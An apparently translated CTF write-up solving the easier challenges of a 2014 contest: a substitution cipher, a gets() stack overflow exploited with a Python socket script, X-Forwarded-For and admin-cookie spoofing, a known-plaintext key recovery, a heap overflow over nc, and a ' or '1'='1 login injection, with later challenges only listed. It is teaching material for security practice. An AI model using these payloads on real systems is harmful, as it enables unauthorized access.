REVERSE 0 RE?
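Where is the reverse-engineering challenge we were promised?
The challenge author hasn't even had breakfast yet, so what's the rush? Head out the door, turn left, and be good and do the Web challenges, OK?
Solution:
This challenge is just being cute. "OK?" "OK!"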
FLAG:
OK
CRYPTO 100 Ancient
The flag for this challenge is not wrapped in ACTF{}.
oivqmqgn, yja vibem naarn yi yxbo sqnyab yjqo q zixuea is gaqbn qdi. ykra jqn zira yi baseazy yjqy qeni ko yja ujbqzw rqdqhkoa. yjkn kn vjqy yja uquab saam kn qpixy: gix nxprky q uquab, va backav ky qom ky dayn uxpeknjam. oi oaam yi vqky q rioyj ib yvi xoyke gix naa gixb qbykzea ko yja oafy ujbqzw knnxa, vjao yja ykra jqn zira, va'ee mazkma yi zirukea q oav knnxa sbir yja qbykzean yjqy jqca paao nxprkyyam. yjqy'n pqnkzqeeg ky. qom dbqp gix seqd jaba, zbguyiiiniziieqrkbkdjy?
Solution:
nowadays, the world seems to turn faster than a couple of years ago. time has come to reflect that also in the phrack magazine. this is what the paper feed is about: you submit a paper, we review it and it gets published. no need to wait a month or two until you see your article in the next phrack issue, when the time has come, we'll decide to compile a new issue from the articles that have been submitted. that's basically it. and grab you flag here, cryptooosocoolamiright?
FLAG:
cryptooosocoolamiright
EXPLOIT 100 Pre-dinner Dessert
nc 218.2.197.236 2009
crypto200.tar.gz
Download link: http://ctf.zjuisa.org/downloads/pwn100.b0aaaddb42c9569ef8a2c4b7a2c9ee18
Solution:
Open it in IDA and decompile to get the main and game functions:
char *__cdecl main()
{
  char *result; // eax@1
  int v1; // [sp+1Ch] [bp-84h]@1
  int (*v2)(void); // [sp+9Ch] [bp-4h]@1
  v2 = 0;
  puts("== Welcome to PWWWWWWWWN world! ==\n");
  fflush(stdout);
  result = gets((char *)&v1);
  if ( v2 )
  {
    puts("You are on the right way.");
    fflush(stdout);
    result = (char *)v2();
  }
  return result;
}

int __cdecl game()
{
  int result; // eax@3
  FILE *stream; // [sp+1Ch] [bp-Ch]@1
  puts("Flag, gei ni yo");
  stream = fopen("/home/pwn/flag.txt", "r");
  while ( 1 )
  {
    result = fgetc(stream);
    if ( (_BYTE)result == -1 )
      break;
    putchar((char)result);
  }
  return result;
}
The game function prints the flag; its entry point is 0x0804855c.
In main, gets can overflow v1 and overwrite v2, so the if branch runs and calls v2. v1 is 128 characters long; append the address of game after it. Note that the address for the call has to be written in reversed (little-endian) byte order (I was stuck on this for a long time...). In Python:
# Python 2
import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('218.2.197.236', 2009))
print sock.recv(1024)
# 128 filler bytes cover v1 (bp-84h up to v2 at bp-4h), then game() = 0x0804855c, least significant byte first
sock.send('\xFF' * 128 + '\x5c\x85\x04\x08' + '\n')
print sock.recv(1024)
sock.close()
FLAG:
ACTF{This_is_an_easy_one_you_have_a_long_w4y_2_go}
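MISC 100 Social Engineering (song fen: free points)
Word is that the losers taking part in ACTF all love hanging out on Tieba :)
Solution:
This one is free points: search for ACTF on Baidu Tieba and you find the thread http://tieba.baidu.com/p/2960754182, then copy the flag: ACTF{WEL0VECTF_SDOIFJDF}
Later on, a lot of people posted troll threads in the ACTF forum to mislead others, sigh~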
FLAG:
ACTF{WEL0VECTF_SDOIFJDF}
WEB 100 The Road to the Flag
Young man, won't you give it a shot? http://218.2.197.236:2005/index.php
Solution:
Opening http://218.2.197.236:2005/index.php shows just one sentence:
Can you GET the way to flag?
View the source:
<html>
<link rel="stylesheet" type="text/css" href="style.css">
<br><br><br><br><br><br><br>
Can you GET the way to flag?
</html>
<!--way = "H4ck_F0r_Fun!GoGoGo!" -->
I saw the comment way="H4ck_F0r_Fun!GoGoGo!" and tried it; yep, as expected, it is not the flag.
Look at the sentence again: an upper-case GET? There must be something fishy. The HTTP GET method?
Try http://218.2.197.236:2005/index.php?way=H4ck_F0r_Fun!GoGoGo!
After submitting, it redirects to http://218.2.197.236:2005/322ad17d5b5fb56a810d9a295ffb5a8c.php
Again just one sentence: "flag can only access in local machine! ", and the source shows nothing. Local access only, so my first thought was a reverse proxy, but how to pull that off? I stayed stuck here for a long while.
Later, going by what the experts said, adding the HTTP request header X-Forwarded-For: 127.0.0.1 is all it takes; resubmit and the flag comes back.
>>> import httplib
>>> con=httplib.HTTPConnection('218.2.197.236',2005)
>>> con.request('GET','//322ad17d5b5fb56a810d9a295ffb5a8c.php','',{'X-Forwarded-For':'127.0.0.1'})
>>> res=con.getresponse()
>>> data=res.read()
>>> print data
<link rel="stylesheet" type="text/css" href="style.css">
Here is your flag: ACTF{I_love_H4ck_and_I_love_F4ck}<br><br><br><br><br><br><br><br>
flag can only access in local machine!
<br>
FLAG:
ACTF{I_love_H4ck_and_I_love_F4ck}
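Why the header works, as an added example that is not part of the original write-up or the challenge's code: a "local only" check that believes X-Forwarded-For, next to one that uses the TCP peer address and honours the header only when the peer is a known reverse proxy. The proxy address 10.0.0.5, the client address 203.0.113.7 and all function names are assumptions made for the illustration (Python 3).

```python
import ipaddress

# Assumption: the one reverse proxy that is allowed to set X-Forwarded-For.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}


def naive_is_local(peer_ip, headers):
    """Flawed check: the client-supplied header decides who is 'local'."""
    claimed = headers.get("X-Forwarded-For", peer_ip)
    return claimed.split(",")[0].strip() == "127.0.0.1"


def client_ip(peer_ip, headers):
    """Resolve the client address; the header counts only behind a trusted proxy."""
    peer = ipaddress.ip_address(peer_ip)
    if peer not in TRUSTED_PROXIES:
        return peer  # direct connection: the header is untrusted input, ignore it
    raw = headers.get("X-Forwarded-For", "")
    hops = [h.strip() for h in raw.split(",") if h.strip()]
    # Proxies append on the right, so walk right to left and stop at the
    # first hop that is not one of our own proxies: that is the client.
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return peer  # malformed header: fall back to the proxy address
        if addr not in TRUSTED_PROXIES:
            return addr
    return peer


def hardened_is_local(peer_ip, headers):
    """Local means the resolved client address is a loopback address."""
    return client_ip(peer_ip, headers).is_loopback


if __name__ == "__main__":
    spoof = {"X-Forwarded-For": "127.0.0.1"}  # constructed request header
    print("naive   :", naive_is_local("203.0.113.7", spoof))
    print("hardened:", hardened_is_local("203.0.113.7", spoof))
```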
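CRYPTO 200 The Grudge of Not Getting a Ticket
Not being able to get TI4 tickets makes life feel so bleak... crypto200.tar.gz
Download link: http://ctf.zjuisa.org/downloads/crypto200.tar.gz.d656ad805747d212e4b49a74a0b4e8c7
Solution:
Download it and extract 4 files: encryptor.py, msg01, msg01.enc, msg02.enc
msg01 is one sentence: Welcome to AAA capture the flag you folks
msg01.enc and msg02.enc are both gibberish
encryptor.py is an encryption program:
# Python 2
f = open('msg01', 'rb').read()
g = open('msg01.enc', 'wb')

key = 'key'
c = ''
t = chr(0)  # previous plaintext byte (0 before the first one)
i = 0

for p in f:
    # c[i] = (p[i] + (key[i mod len] XOR p[i-1]) + i**i) mod 256
    c = chr(( ord(p) + (ord(key[i % len(key)]) ^ ord(t)) + i**i ) & 0xff)
    t = p
    i += 1
    g.write(c)

g.close()
Running it, I found that encrypting msg01 gives a result different from the msg01.enc supplied with the challenge. Judging from the code, the key must be different, so the main task is to find the key. Since both the plaintext msg01 and the ciphertext msg01.enc are known, I wrote the following code:
# Python 2
f = open('msg01', 'rb').read()
g = open('msg01.enc', 'rb').read()
k = open('key','wb')

key = ''
t = chr(0)
i = 0

for p in f:
    # key[i] = ((c[i] - i**i - p[i]) mod 256) XOR p[i-1]
    key = chr(((ord(g[i]) - i**i - ord(p)) & 0xff) ^ ord(t))
    t = p
    i +=1
    k.write(key)
k.close()
Running it gives the key: DoNotTryToGuessWhatDoesD3AdCa7ThinkOfDoNo
The trailing DoNo is where the key starts to cycle from the beginning, so take the long run before it, DoNotTryToGuessWhatDoesD3AdCa7ThinkOf, as the final key and write the decryption code:
# Python 2
f = open('msg02', 'wb')
g = open('msg02.enc', 'rb').read()

key='DoNotTryToGuessWhatDoesD3AdCa7ThinkOf'
c = ''
t = chr(0)
i = 0

for p in g:
    # p[i] = (c[i] - i**i - (key[i mod len] XOR p[i-1])) mod 256
    c = chr((ord(p) - i**i - (ord(key[i % len(key)]) ^ ord(t))) & 0xff)
    t = c  # the byte just decrypted feeds the next step
    i += 1
    f.write(c)
f.close()
Running it gives: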
High demand! No matches...
Search again for these tickets (a fan may have let them go) or change quantity/ticket type.
Get This damn fl4g plz
ACTF{why_can_not_I_buy_a_TI4_ticket_It_it_so_terrible!!!!!!!!!!}
FLAG:
ACTF{why_can_not_I_buy_a_TI4_ticket_It_it_so_terrible!!!!!!!!!!}
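The whole known-plaintext attack in one place, as an added example that is not part of the original write-up: a Python 3 port of the cipher, the keystream recovery, and a period search that replaces trimming the repeated "DoNo" by eye. MSG01 and KEY are the values shown above; MSG02 and every function name are constructed for the illustration.

```python
# Python 3. MSG01 and KEY are the values shown in the write-up; MSG02 is constructed.
MSG01 = b"Welcome to AAA capture the flag you folks"
KEY = b"DoNotTryToGuessWhatDoesD3AdCa7ThinkOf"
MSG02 = b"constructed second message, longer than the key, to exercise wrap-around"


def tweak(i):
    """i**i mod 256 without the huge intermediate (Python defines 0**0 == 1)."""
    return pow(i, i, 256)


def encrypt(plain, key):
    """c[i] = (p[i] + (key[i % len] ^ p[i-1]) + i**i) mod 256, with p[-1] = 0."""
    out, prev = bytearray(), 0
    for i, p in enumerate(plain):
        out.append((p + (key[i % len(key)] ^ prev) + tweak(i)) & 0xFF)
        prev = p
    return bytes(out)


def decrypt(cipher, key):
    """Invert encrypt(); the byte just recovered feeds the next position."""
    out, prev = bytearray(), 0
    for i, c in enumerate(cipher):
        prev = (c - tweak(i) - (key[i % len(key)] ^ prev)) & 0xFF
        out.append(prev)
    return bytes(out)


def recover_keystream(plain, cipher):
    """Known plaintext: key[i % len] = ((c[i] - i**i - p[i]) mod 256) ^ p[i-1]."""
    ks, prev = bytearray(), 0
    for i, (p, c) in enumerate(zip(plain, cipher)):
        ks.append(((c - tweak(i) - p) & 0xFF) ^ prev)
        prev = p
    return bytes(ks)


def shortest_period(ks):
    """Shortest prefix that regenerates ks when repeated.

    Only equals the key if the known plaintext is longer than the key;
    otherwise no repeat is visible and the whole keystream comes back.
    """
    for n in range(1, len(ks) + 1):
        if all(ks[i] == ks[i % n] for i in range(len(ks))):
            return ks[:n]
    return ks


if __name__ == "__main__":
    stream = recover_keystream(MSG01, encrypt(MSG01, KEY))
    key = shortest_period(stream)
    print(stream.decode(), "->", key.decode())
    print(decrypt(encrypt(MSG02, KEY), key).decode())
```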
EXPLOIT 200 Kill the Pig, Eat the Meat
nc 218.2.197.236 2010
crypto200.tar.gz
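Download link: http://ctf.zjuisa.org/downloads/pwn200.676407435f65a98b11f7a3398491e04b
Solution:
Open the downloaded file in IDA: it turns out to be 64-bit, which the decompiler plugin does not support, so the only option was to dig through the assembly, ugh...
Start reading from the main function: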
  1 .text:0000000000400A1A public main
  3 .text:0000000000400A1A main:
  5 .text:0000000000400A1A push rbp
  7 .text:0000000000400A1B mov rbp, rsp
  9 .text:0000000000400A1E sub rsp, 0A0h
 11 .text:0000000000400A25 mov [rbp-94h], edi
 13 .text:0000000000400A2B mov [rbp-0A0h], rsi
 15 .text:0000000000400A32 mov edi, offset a_________ ; " _____ _ _ "...
 17 .text:0000000000400A37 call _puts
 19 .text:0000000000400A3C mov edi, offset a___ ; "/ ___|| | | | |"...
 21 .text:0000000000400A41 call _puts
 23 .text:0000000000400A46 mov edi, offset a______________ ; "\\ `--. | | __ _ _ _ __ _ | |__ |"...
 25 .text:0000000000400A4B call _puts
 27 .text:0000000000400A50 mov edi, offset a__________ ; " `--. \\| | / _` || | | | / _` || '_ \\ |"...
 29 .text:0000000000400A55 call _puts
 31 .text:0000000000400A5A mov edi, offset a________ ; "/\\__/ /| || (_| || |_| || (_| || | | ||"...
 33 .text:0000000000400A5F call _puts
 35 .text:0000000000400A64 mov edi, offset a_____________0 ; "\\____/ |_| \\__,_| \\__,_| \\__, ||_| |_| "...
 37 .text:0000000000400A69 call _puts
 39 .text:0000000000400A6E mov edi, offset a__ ; " __/ | "...
 41 .text:0000000000400A73 call _puts
 43 .text:0000000000400A78 mov edi, offset a____0 ; " |___/ "...
 45 .text:0000000000400A7D call _puts
 47 .text:0000000000400A82 mov rax, cs:stdout@@GLIBC_2_2_5
 49 .text:0000000000400A89 mov rdi, rax
 51 .text:0000000000400A8C call _fflush
 53 .text:0000000000400A91 jmp short loc_400A94
 55 .text:0000000000400A93 ; ---------------------------------------------------------------------------
 57 .text:0000000000400A93
 59 .text:0000000000400A93 loc_400A93: ; CODE XREF: .text:0000000000400BE2j
 61 .text:0000000000400A93 ; .text:0000000000400C50j ...
 63 .text:0000000000400A93 nop
 65 .text:0000000000400A94
 67 .text:0000000000400A94 loc_400A94: ; CODE XREF: .text:0000000000400A91j
 69 .text:0000000000400A94 mov rdx, cs:service
 71 .text:0000000000400A9B mov rax, cs:auth
 73 .text:0000000000400AA2 mov rsi, rax
 75 .text:0000000000400AA5 mov edi, offset aKillpigPFeedpi ; "[ killPig = %p, feedPig = %p ]\n"
 77 .text:0000000000400AAA mov eax, 0
 79 .text:0000000000400AAF call _printf
 81 .text:0000000000400AB4 mov rax, cs:stdout@@GLIBC_2_2_5
 83 .text:0000000000400ABB mov rdi, rax
 85 .text:0000000000400ABE call _fflush
 87 .text:0000000000400AC3 mov rdx, cs:stdin@@GLIBC_2_2_5
 89 .text:0000000000400ACA lea rax, [rbp-90h]
 91 .text:0000000000400AD1 mov esi, 80h
 93 .text:0000000000400AD6 mov rdi, rax
 95 .text:0000000000400AD9 call _fgets
 97 .text:0000000000400ADE test rax, rax
 99 .text:0000000000400AE1 jz loc_400C5A ; X
101 .text:0000000000400AE7 lea rax, [rbp-90h]
103 .text:0000000000400AEE mov edx, 8
105 .text:0000000000400AF3 mov esi, offset aKillpig ; "killPig "
107 .text:0000000000400AF8 mov rdi, rax
109 .text:0000000000400AFB call _strncmp
111 .text:0000000000400B00 test eax, eax
113 .text:0000000000400B02 jnz short loc_400B64
115 .text:0000000000400B04 mov edi, 8
117 .text:0000000000400B09 call _malloc
119 .text:0000000000400B0E mov cs:auth, rax
121 .text:0000000000400B15 mov rax, cs:auth
123 .text:0000000000400B1C mov edx, 8
125 .text:0000000000400B21 mov esi, 0
127 .text:0000000000400B26 mov rdi, rax
129 .text:0000000000400B29 call _memset
131 .text:0000000000400B2E lea rax, [rbp-90h]
133 .text:0000000000400B35 add rax, 8
135 .text:0000000000400B39 mov rdi, rax
137 .text:0000000000400B3C call _strlen
139 .text:0000000000400B41 cmp rax, 1Eh
141 .text:0000000000400B45 ja short loc_400B64
143 .text:0000000000400B47 mov rax, cs:auth
145 .text:0000000000400B4E lea rdx, [rbp-90h]
147 .text:0000000000400B55 add rdx, 8
149 .text:0000000000400B59 mov rsi, rdx
151 .text:0000000000400B5C mov rdi, rax
153 .text:0000000000400B5F call _strcpy
155 .text:0000000000400B64
157 .text:0000000000400B64 loc_400B64: ; CODE XREF: .text:0000000000400B02j
159 .text:0000000000400B64 ; .text:0000000000400B45j
161 .text:0000000000400B64 lea rax, [rbp-90h]
163 .text:0000000000400B6B mov edx, 5
165 .text:0000000000400B70 mov esi, offset aReset ; "reset"
167 .text:0000000000400B75 mov rdi, rax
169 .text:0000000000400B78 call _strncmp
171 .text:0000000000400B7D test eax, eax
173 .text:0000000000400B7F jnz short loc_400B90
175 .text:0000000000400B81 mov rax, cs:auth
177 .text:0000000000400B88 mov rdi, rax
179 .text:0000000000400B8B call _free
181 .text:0000000000400B90
183 .text:0000000000400B90 loc_400B90: ; CODE XREF: .text:0000000000400B7Fj
185 .text:0000000000400B90 lea rax, [rbp-90h]
187 .text:0000000000400B97 mov edx, 7
189 .text:0000000000400B9C mov esi, offset aFeedpig ; "feedPig"
191 .text:0000000000400BA1 mov rdi, rax
193 .text:0000000000400BA4 call _strncmp
195 .text:0000000000400BA9 test eax, eax
197 .text:0000000000400BAB jnz short loc_400BC7
199 .text:0000000000400BAD lea rax, [rbp-90h]
201 .text:0000000000400BB4 add rax, 8
203 .text:0000000000400BB8 mov rdi, rax
205 .text:0000000000400BBB call _strdup
207 .text:0000000000400BC0 mov cs:service, rax
209 .text:0000000000400BC7
211 .text:0000000000400BC7 loc_400BC7: ; CODE XREF: .text:0000000000400BABj
213 .text:0000000000400BC7 lea rax, [rbp-90h]
215 .text:0000000000400BCE mov edx, 5
217 .text:0000000000400BD3 mov esi, offset aEatit ; "eatIt"
219 .text:0000000000400BD8 mov rdi, rax
221 .text:0000000000400BDB call _strncmp
223 .text:0000000000400BE0 test eax, eax
225 .text:0000000000400BE2 jnz loc_400A93
227 .text:0000000000400BE8 mov rax, cs:auth
229 .text:0000000000400BEF mov eax, [rax+20h]
231 .text:0000000000400BF2 test eax, eax
233 .text:0000000000400BF4 jz short loc_400C37
235 .text:0000000000400BF6 mov edi, offset aFlagGeiNiYooo ; "Flag, gei ni yooo"
237 .text:0000000000400BFB call _puts
239 .text:0000000000400C00 mov esi, offset aR ; "r"
241 .text:0000000000400C05 mov edi, offset aHomePwnFlag_tx ; "/home/pwn/flag.txt"
243 .text:0000000000400C0A call _fopen
245 .text:0000000000400C0F mov [rbp-8], rax
247 .text:0000000000400C13 jmp short loc_400C20
249 .text:0000000000400C15 ; ---------------------------------------------------------------------------
251 .text:0000000000400C15
253 .text:0000000000400C15 loc_400C15: ; CODE XREF: .text:0000000000400C33j
255 .text:0000000000400C15 movsx eax, byte ptr [rbp-9]
257 .text:0000000000400C19 mov edi, eax
259 .text:0000000000400C1B call _putchar
261 .text:0000000000400C20
263 .text:0000000000400C20 loc_400C20: ; CODE XREF: .text:0000000000400C13j
265 .text:0000000000400C20 mov rax, [rbp-8]
267 .text:0000000000400C24 mov rdi, rax
269 .text:0000000000400C27 call _fgetc
271 .text:0000000000400C2C mov [rbp-9], al
273 .text:0000000000400C2F cmp byte ptr [rbp-9], 0FFh
275 .text:0000000000400C33 jnz short loc_400C15
277 .text:0000000000400C35 jmp short loc_400C55
279 .text:0000000000400C37 ; ---------------------------------------------------------------------------
281 .text:0000000000400C37
283 .text:0000000000400C37 loc_400C37: ; CODE XREF: .text:0000000000400BF4j
285 .text:0000000000400C37 mov edi, offset aWhoAreYouZhuto ; "Who are you! zhutou bu shi ni xiang chi"...
287 .text:0000000000400C3C call _puts
289 .text:0000000000400C41 mov rax, cs:stdout@@GLIBC_2_2_5
291 .text:0000000000400C48 mov rdi, rax
293 .text:0000000000400C4B call _fflush
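The overall logic compares the input string, in order, with "killPig " (with a trailing space), "reset", "feedPig" and "eatIt", and jumps to the corresponding operation.
Line 233 has the key jump: jz short loc_400C37. eax must be non-zero for the flag-printing code below it to run.
eax is the value starting at auth+20h, with auth in the .bss segment. That memory is allocated and zeroed when "killPig " is submitted; then submitting "feedPig" plus an overlong string overflows from service and overwrites auth; finally, submitting "eatIt" prints the flag: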
C:\nc11nt>nc 218.2.197.236 2010
[ASCII-art banner]
[ killPig = (nil), feedPig = (nil) ]
killPig 
[ killPig = 0x2170010, feedPig = (nil) ]
feedPigaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaa
[ killPig = 0x2170010, feedPig = 0x2170030 ]
[ killPig = 0x2170010, feedPig = 0x2170030 ]
eatIt
Flag, gei ni yooo
ACTF{Why_not_try_zio_to_Pwwwwwwwwwn_Everything}
[ killPig = 0x2170010, feedPig = 0x2170030 ]
FLAG:
ACTF{Why_not_try_zio_to_Pwwwwwwwwwn_Everything}
WEB 200 The Annoying Admin
The FLAG is in admin's hands! http://218.2.197.236:2005/web200/index.php
Solution:
Opening http://218.2.197.236:2005/web200/index.php shows a login page; standard injection: ' or '1'='1
It hints that the flag is in ae6032eeeb5cedc1555940983435335b.php
Open http://218.2.197.236:2005/web200/ae6032eeeb5cedc1555940983435335b.php
One line: wrong place man! key is not here.
Are you kidding me! Sure enough, it is a trick.
Capture the raw response with wireshark:
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Sun, 06 Apr 2014 14:09:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.10
realkeyisin: beda47ac34562108ee149767c61cb0ec.php
7d
<link rel="stylesheet" type="text/css" href="style.css">
<br><br><br><br><br><br><br><br>
wrong place man! key is not here.
Notice the header realkeyisin: beda47ac34562108ee149767c61cb0ec.php
Open http://218.2.197.236:2005//web200/beda47ac34562108ee149767c61cb0ec.php
One line: You find it! But only admin can see the flag...can you see it?
Something about the admin again; at this point I couldn't make sense of it. I heard that adding Cookie: admin=1 is enough?
GET http://218.2.197.236:2005//web200/beda47ac34562108ee149767c61cb0ec.php HTTP/1.1
Host: 218.2.197.236:2005
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: admin=1
This challenge comes down purely to luck.
>>> import httplib
>>> con=httplib.HTTPConnection('218.2.197.236',2005)
>>> con.request('GET','/web200/beda47ac34562108ee149767c61cb0ec.php','',{'Cookie':'admin=1'})
>>> res=con.getresponse()
>>> data=res.read()
>>> print data
<link rel="stylesheet" type="text/css" href="style.css">

<br><br><br><br><br><br><br><br>

You find it! But only admin can see the flag...can you see it?<br>

flag:ACTF{I_donot_need_sex_life_fxxks_me_everyday}
>>>
FLAG:
ACTF{I_donot_need_sex_life_fxxks_me_everyday}
That's it. At my level I can only manage the 100 and 200 point challenges; for the rest I'll sit and wait for the experts' write-ups.
MISC 300 S4ndb0x
http://218.2.197.236:2015
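MISC 300 Packet Capture (zhua zhu: catch the pig)
All of the mobile traffic Zhutou used in the study room has been captured! See what interesting things are in the traffic?
Link: http://pan.baidu.com/s/1ntrzThB Password: cbf2
MISC 300 Find (ri) the Bug (pig)
Zhutou likes browsing oschina and asked Dead Cat for an Android client, but Dead Cat, with ill intent, left a backdoor in it. Word is that Zhutou used oschina private messages to arrange a date with a girl; now you get your chance: can you steal Zhutou's hookup private messages? You have to get past the antivirus, of course.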
http://218.2.197.236:2007
WEB 300 Meow Meow Meow Meow
Admin Xiao Lu set up a server, but it seems to have quite a few vulnerabilities.
http://218.2.197.236:2001/index.html
CRYPTO 400 Big Brother aay's Secret
Big Brother aay has given you a mysterious file; deal with it as you see fit. flag.rar
Download link: http://ctf.zjuisa.org/downloads/flag.rar.f4cc03f0637d6ac68e5fa230a65a4071
MISC 400 Sponsors
Everybody, come and look at the sponsors! hidden.png
Download link: http://ctf.zjuisa.org/downloads/hidden.png.dc1ae8d8f43c52dd53cce50b7b253593
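WEB 400 Gongwan-chan
If you could not solve web300, there is not much hope of solving this one. Do you think you are the adorable Gongwan-chan? ( つ•̀ω•́)つ
(Does "Gongwan-chan" count as a hint or not?)
(Neither web300 nor web400 requires a scanner)
(The flag for this challenge is not in ACTF form, and the flag you submit does not need to contain brackets of any kind)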
http://218.2.197.236:2003
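Hint
Information that can now be made public:
The admin is a very lazy person; his notes contain almost no filler.
WEB 500 The Deranged Hacker
The server set up by admin Xiao Lu got thoroughly pwned (see web300), and Xiao Lu got chewed out by the boss. The boss then ordered Xiao Lu to set it up again, so Xiao Lu rebuilt the web300 site on some internal network with a different architecture (the original was nginx) and patched some of the vulnerabilities. The boss and Xiao Lu are both users on that server, so whenever the boss finds that Xiao Lu has written vulnerable code again, it is recorded on the server right away.
Accept the challenge, hackers: pwn this internal server whose location is unknown!!!
(This challenge is closely tied to the earlier web challenges!!!)
(Some key files are reset every ten minutes!!!)
(The flag for this challenge does not contain the text ACTF and does not contain any brackets!!!)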
(Drink All The Booze , Hack All The Things!!!)
Hint
Step one: work out where the server is
REVERSE 800 Chaos
Download: http://pan.baidu.com/s/1i3GA4zr
Password: ophk
ATQA (SENS_RES): 00 04
UID (NFCID1): AD EA DC A7
SAK (SEL_RES): 08
Please help this Dead Cat compute KeyA of sector 0 and KeyB of sector 3
Flag = ( Sector_0_KeyA + Sector_3_KeyB ).encode('hex').upper()
Hint
exported and non-exported entries can ease your life
Log => Code Path, Google => Document, Server => Secret, Reuse => No More Reverse
REVERSE 800 NonStandard
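Link: http://pan.baidu.com/s/1pJO5QeZ Password: lk1d
If you can't write a keygen, you'd be embarrassed to say you do reverse engineering
Please write a keygen and send it to ACTF.NonStandard@gmail.com; dealing with the "hidden traps" earns extra points
Hint
Look at the title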
REVERSE 800 Verify
Link: http://pan.baidu.com/s/1GOO3c Password: 6q9f
Hint
RTFM
Over